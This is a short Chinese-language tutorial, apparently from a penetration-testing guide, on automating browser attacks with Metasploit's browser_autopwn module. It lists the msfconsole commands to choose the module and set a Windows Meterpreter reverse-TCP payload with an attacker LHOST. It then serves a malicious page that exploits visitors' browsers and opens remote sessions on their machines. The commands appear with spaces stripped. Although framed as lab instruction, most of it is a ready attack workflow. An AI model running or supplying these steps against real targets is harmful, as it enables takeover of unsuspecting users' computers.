MSF中自动化浏览器攻击

浏览器渗透测试原理实施browser_autopwn模块browser_autopwn是Metasploit提供的辅助功能模块。在用户访问Web页面时，它会自动攻击受害者的浏览器。在开始攻击之前，browser_autopwn能够检测用户使用的浏览器类型，browser_autopwn将根据浏览器的检测结果，自行部署最合适的exploit。准备工作在进行下一步操作之前，系统需要接入内部网络。操作步骤打开一个终端窗口，开始本示例。1．打开一个终端窗口。2．启动MSFCONSOLE。msfconsole3．搜索Autopwn模块。searchautopwn4．使用browser_autopwn模块。useauxiliary/server/browser_autopwn5．设置payload。本示例使用Windows反向TCP。setpayloadwindows/meterpreter/reverse_tcp6．显示该类型负载的选项。showoptions7．设置反向TCP连接将要连接的主机IP地址。在本示例中，IP地址是192.168.137.128。setLHOST192.168.137.1288．接下来，设置URI路径。本示例使用filetypes（连同引号一起使用）。setURIPATHfiletypes9．执行exploit。exploit10．Metasploit将模仿一个网站，其网址是http://[您设定的IP/LHOST参数]:[SRVPORT参数/默认是8080]。11．当有人访问这个网址时，browser_autopwn模块尝试连接用户的机器，并试图建立远程会话。如果成功，Meterpreter将会进行确认。使用session命令可以激活会话。session-i112．要显示我们可以运行的Meterpreter命令列表，可以使用help命令